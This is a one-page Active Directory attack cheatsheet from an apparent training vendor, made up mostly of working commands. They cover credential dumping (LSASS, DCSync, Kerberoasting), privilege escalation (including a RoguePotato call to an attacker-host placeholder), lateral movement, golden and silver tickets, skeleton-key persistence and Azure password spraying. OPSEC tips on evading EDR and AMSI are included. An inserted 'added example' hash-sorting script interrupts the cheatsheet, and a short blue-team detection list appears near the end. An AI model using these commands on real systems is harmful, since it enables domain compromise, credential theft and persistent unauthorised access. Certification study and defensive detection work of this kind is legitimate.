One-page Windows Active Directory attack cheatsheet — every command Indian red teamers reach for in real engagements in 2026, organised by phase of the kill chain. Pair with our full Active Directory Pentest Guide India 2026 for the explanation behind each technique.
Bookmark, print, and keep open during OSCP, CRTO, and real engagements.
1. Enumeration (post-foothold)
# From Linux: null session / anonymous bind first
nxc smb target -u '' -p '' --shares
ldapsearch -x -H ldap://target -s base -b '' '(objectClass=*)' # rootDSE: naming contexts, DC hostname, supported SASL mechs
# From Linux: once you hold any domain credential
impacket-GetADUsers -all -dc-ip target DOMAIN/user:pass
# From Windows — PowerView / SharpView
Get-NetDomain
Get-NetDomainController
Get-NetUser | select samaccountname,description
Get-NetGroupMember -GroupName "Domain Admins"
Get-NetComputer | select name,operatingsystem
Get-NetOU -FullData
Find-LocalAdminAccess
Find-DomainShare -CheckShareAccess
# BloodHound collection
# From Linux
bloodhound-python -d domain.local -u user -p pass -dc dc01.domain.local -c all
# From Windows
.\SharpHound.exe -c All
# LDAP dump (creds not required if anonymous bind works)
windapsearch -d domain.local --dc-ip target --users --groups --computers

2. Credential attacks
Kerberoasting
# Linux
impacket-GetUserSPNs -request -dc-ip DC_IP DOMAIN/user:pass
# Windows — Rubeus
Rubeus.exe kerberoast /outfile:spns.txt
Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
Rubeus.exe kerberoast /nowrap /rc4opsec # only accounts without AES enabled: RC4 tickets crack faster and you avoid an RC4 downgrade request that 4769 monitoring catches
# Crack offline
hashcat -m 13100 spns.txt rockyou.txt -r OneRuleToRuleThemAll.rule
# AES tickets (etype 17/18) need -m 19600 / -m 19700; 13100 only parses RC4 (etype 23)

AS-REP Roasting
impacket-GetNPUsers DOMAIN/ -usersfile users.txt -no-pass -dc-ip DC
Rubeus.exe asreproast /nowrap /outfile:asrep.txt
hashcat -m 18200 asrep.txt rockyou.txt
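The two cracking lines above both assume RC4 hashes. The following is an added example, not part of the original cheatsheet, that sorts a mixed dump of Kerberoast and AS-REP hashes (as impacket, Rubeus and GetNPUsers print them) into the correct hashcat mode before anything is cracked, because an AES ticket fed to -m 13100 is rejected as malformed. The sample hashes, the output directory and the wordlist/rule names are constructed placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the cheatsheet): route roast hashes to hashcat modes.
# Modes: 13100 = TGS RC4 (etype 23), 19600 = TGS AES128 (17), 19700 = TGS AES256 (18),
# 18200 = AS-REP RC4 (23). AES AS-REP hashes are left for manual review: check
# `hashcat --example-hashes` for the mode your hashcat version ships.
set -u

# Map one roast hash to a hashcat mode (or "unknown").
roast_mode() {
  case "$1" in
    '$krb5tgs$23$'*)   echo 13100 ;;
    '$krb5tgs$17$'*)   echo 19600 ;;
    '$krb5tgs$18$'*)   echo 19700 ;;
    '$krb5asrep$23$'*) echo 18200 ;;
    *)                 echo unknown ;;
  esac
}

# Split a mixed hash file into <outdir>/<mode>.txt; prints "mode count" per file.
split_roasts() {
  local infile="$1" outdir="$2" line mode f
  mkdir -p "$outdir"
  while IFS= read -r line || [ -n "$line" ]; do
    [ -z "$line" ] && continue
    mode=$(roast_mode "$line")
    printf '%s\n' "$line" >> "$outdir/$mode.txt"
  done < "$infile"
  for f in "$outdir"/*.txt; do
    printf '%s %s\n' "$(basename "$f" .txt)" "$(wc -l < "$f" | tr -d ' ')"
  done
}

# One hashcat command per mode file (printed, not executed); unknown.txt is skipped.
crack_commands() {
  local outdir="$1" wordlist="${2:-rockyou.txt}" rules="${3:-OneRuleToRuleThemAll.rule}" f mode
  for f in "$outdir"/*.txt; do
    mode=$(basename "$f" .txt)
    [ "$mode" = unknown ] && continue
    printf 'hashcat -m %s %s %s -r %s\n' "$mode" "$f" "$wordlist" "$rules"
  done
}

# Constructed sample (truncated fake hashes): two RC4, two AES, a blank line and a stray tool banner.
make_sample() {
  cat > "$1" <<'EOF'
$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$0a1b2c3d$deadbeef
$krb5tgs$18$svc_http$DOMAIN.LOCAL$*HTTP/web01.domain.local*$0a1b2c3d$deadbeef
$krb5asrep$23$nopreauth@DOMAIN.LOCAL:0a1b2c3d$deadbeef

$krb5tgs$17$svc_old$DOMAIN.LOCAL$*cifs/fs01.domain.local*$0a1b2c3d$deadbeef
[*] Getting TGS for svc_old
EOF
}

# Demo run
work=$(mktemp -d)
make_sample "$work/all.txt"
split_roasts "$work/all.txt" "$work/out"
crack_commands "$work/out"
```

In practice you concatenate spns.txt and asrep.txt, run split_roasts once, and crack each mode file separately; whatever lands in unknown.txt is either a tool banner or a hash type the script does not know, and deserves a look rather than being silently dropped.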

LSASS dump (local admin / SeDebugPrivilege required)
# LOLBin comsvcs.dll: nothing to drop on disk, but the MiniDump export is well signatured by EDR now
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\temp\lsass.dmp full
# Microsoft-signed procdump (the -accepteula avoids the first-run dialog)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Task Manager GUI (most stealthy against some EDRs)
# taskmgr → right-click lsass.exe → Create dump file
# Parse offline
pypykatz lsa minidump lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" exit

DCSync (needs Replicating Directory Changes + Replicating Directory Changes All on the domain object; Domain Admins, Enterprise Admins and DC machine accounts have both by default)
impacket-secretsdump DOMAIN/user:pass@DC
impacket-secretsdump -just-dc-user Administrator DOMAIN/user:pass@DC
mimikatz: lsadump::dcsync /domain:domain.local /user:krbtgt

3. Privilege escalation
Local priv-esc recon
# Automated
winPEAS.exe
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended
# Manual checks
whoami /priv
whoami /groups
net localgroup administrators

SeImpersonate / SeAssignPrimaryToken abuse
# If you hold SeImpersonatePrivilege (typical for IIS, MSSQL and other service accounts)
PrintSpoofer.exe -i -c cmd.exe # needs the Print Spooler service running on the box
GodPotato -cmd "cmd /c whoami" # .NET potato, works on current Windows 10/11 and Server 2016-2022
RoguePotato.exe -r ATTACKER_IP -e "cmd /c whoami" -l 9999 # needs a redirector on the attacker: socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999

Certipy / ADCS exploitation
# Enumerate templates and flag the exploitable ones
certipy find -u user@domain -p pass -dc-ip DC -vulnerable
# ESC1: template lets the enrollee supply the SAN, so request a cert for the DA UPN
certipy req -u user@domain -p pass -dc-ip DC -target CA-HOST -ca CA-NAME -template VulnTemplate -upn administrator@domain
# Authenticate with the cert (PKINIT) → TGT plus the account's NT hash
certipy auth -pfx administrator.pfx -dc-ip DC

4. Lateral movement
Pass-the-Hash (PtH)
# Linux
impacket-psexec DOMAIN/user@target -hashes :NTHASH
nxc smb target -u user -H NTHASH -x whoami
nxc winrm target -u user -H NTHASH -X "ipconfig"
# Windows: Mimikatz (needs admin; spawns a process whose network logons use the hash, logon type 9 on this host)
sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:HASH /run:cmd.exe

Pass-the-Ticket (PtT)
# Linux: convert a Windows .kirbi to .ccache
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=$PWD/ticket.ccache
impacket-psexec -k -no-pass DOMAIN/user@target.domain.local # use the FQDN: Kerberos needs a matching SPN, an IP falls back to NTLM or fails
# Windows: Rubeus
Rubeus.exe ptt /ticket:base64_ticket

Over-Pass-the-Hash
# Ask the DC for a real TGT with the hash or key (no elevation needed, unlike sekurlsa::pth)
Rubeus.exe asktgt /user:Administrator /rc4:HASH /domain:domain.local /dc:DC /ptt
Rubeus.exe asktgt /user:Administrator /aes256:AESKEY /domain:domain.local /dc:DC /ptt # preferred: an RC4 AS-REQ from a modern host stands out in 4768

Remote exec options
# By noise level, quietest first (psexec and smbexec create a service on the target, logged as Event 7045; psexec also drops a binary in ADMIN$)
winrm → wmiexec → smbexec → psexec
impacket-wmiexec DOMAIN/user:pass@target
impacket-psexec DOMAIN/user:pass@target
impacket-smbexec DOMAIN/user:pass@target
evil-winrm -i target -u user -p pass
# NetExec (successor to CrackMapExec) — fantastic all-in-one
nxc smb target -u user -p pass --shares
nxc smb target -u user -p pass -x "whoami"
nxc winrm target -u user -p pass -X "ipconfig"
nxc ldap target -u user -p pass --trusted-for-delegation

5. Persistence
Golden Ticket
# Need the krbtgt NT hash (or AES256 key, swap /krbtgt: for /aes256:) first, from DCSync
mimikatz:
kerberos::golden /user:backdoor /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
# The forged TGT is valid for 10 years by default, and a single krbtgt reset does not kill it: the previous key stays accepted until the second reset

Silver Ticket
mimikatz:
kerberos::golden /user:svc_admin /domain:d.local /sid:S-1-5-21-xxx /target:server.d.local /service:cifs /rc4:NTHASH /ptt
# /rc4 is the NT hash of the account the service runs as: the computer account (server$) for cifs/host/rpcss, the service account for an SPN such as MSSQLSvc. The DC is never contacted, so nothing is logged there

AdminSDHolder ACL
# Grant GenericAll on AdminSDHolder → propagates to all protected objects every 60 minutes
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor -Rights All

Skeleton Key (on DC with SYSTEM)
mimikatz: privilege::debug
misc::skeleton
# Now the password "mimikatz" works for every account alongside the real one. It is an in-memory LSASS patch: gone on reboot, and it fails against a PPL-protected LSASS

6. Hybrid / Azure AD attacks
# ROADtools: Entra ID (Azure AD) recon
roadrecon auth -u user@domain.onmicrosoft.com -p pass
roadrecon gather
roadrecon gui
# AADInternals: swiss army knife for Entra ID
Import-Module AADInternals
Get-AADIntLoginInformation -UserName user@target.com # unauthenticated: managed vs federated, federation endpoint
Invoke-AADIntReconAsOutsider -DomainName target.com # unauthenticated: tenant ID and every domain registered to the tenant
# MSOLSpray: password spray against Azure (one password per pass, long sleep: smart lockout counts failures per account)
python3 MSOLSpray.py --userlist users.txt --password 'Welcome@2026' --sleep 300
# TokenTactics: refresh-token / FOCI abuse (swap a refresh token from one first-party client for an access token to another)
Get-AzureToken -Client MSTeams
Get-TenantID -Domain target.com
Connect-MgGraph -AccessToken ($token | ConvertTo-SecureString -AsPlainText -Force) # Graph SDK v2 wants a SecureString

OPSEC tips for modern engagements
- Avoid mimikatz.exe unobfuscated: every EDR detects it. Use an in-memory invoke (e.g. Invoke-Mimikatz with an AMSI bypass) or compile your own variant
- LSASS dumping: prefer comsvcs.dll or PPLdump over direct Mimikatz on a live host
- Use NTLM less: modern AD environments alert on NTLM from non-standard sources. Prefer Kerberos + PtT/over-PtH, and AES keys over RC4 hashes
- BloodHound collections are VERY noisy: use -c Session,Group,Acl,Trusts rather than -c All on red-team engagements
- Don't Kerberoast from the same user that phished in: separate the recon account from the exploitation account
- Stay under 10 LDAP queries per minute: slow and deliberate beats fast and caught
What blue teams will detect
- Kerberoasting: Event 4769 with TicketEncryptionType 0x17 (RC4) for a non-machine service account, especially a burst of them from one client
- AS-REP roast: Event 4768 with PreAuthType 0 (no pre-authentication) from an unusual source IP
- LSASS access: Sysmon Event 10 on lsass.exe from an unusual source process, or with a read access mask such as 0x1010 or 0x1fffff
- DCSync: Event 4662 on the DC with Properties containing 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) from an account that is not a domain controller
- Golden Ticket: TGT lifetime beyond domain policy (mimikatz defaults to 10 years), logons for accounts that do not exist in AD, and impossible-travel logons
- PtH: sekurlsa::pth shows on the source host as Event 4624 logon type 9 (NewCredentials) with logon process seclogo; on the target it is a logon type 3 NTLM authentication from a host that does not normally talk to it
See our SOC Analyst Training India 2026 for blue-team detection engineering.
FAQ
Which cheatsheet tool do I learn first — BloodHound or Mimikatz?
BloodHound. Without understanding relationships, Mimikatz output is just text dumps. BloodHound tells you what to steal; Mimikatz helps you steal it.
Does this cheatsheet cover the OSCP AD section?
Yes. Sections 1-4 cover every technique on the current OSCP exam AD set. Section 5 and 6 are for CRTO-level work, beyond OSCP scope.
Do I need Cobalt Strike to learn these?
No. Every command here runs with free open-source tools. Cobalt Strike adds OPSEC and command-and-control management but no new fundamental capability.
NetExec vs CrackMapExec — same tool?
NetExec (nxc) is the actively maintained successor fork of CrackMapExec, started after the original project was retired. Same syntax, more protocols, more checks. Use NetExec in 2026.
Is MITRE ATT&CK mapping worth learning for OSCP/CRTO?
Less for OSCP, more for CRTO. OSCP tests if you can get in and get DA. CRTO tests if you can describe the tradecraft professionally — MITRE mapping is increasingly expected in red team reports for senior roles.
Train in the real kill chain
Macksofy OSCP Bootcamp includes 30+ hours of AD lab time with BloodHound, Kerberoasting, and ADCS practice — mapped exactly to OSCP’s exam AD set. Our CRTO mentorship programme extends into full Cobalt Strike, ADCS ESC1-13, and Azure AD attack chains. Contact us for next batch dates.
Also read our CRTO vs OSCP comparison to decide which certification to tackle first.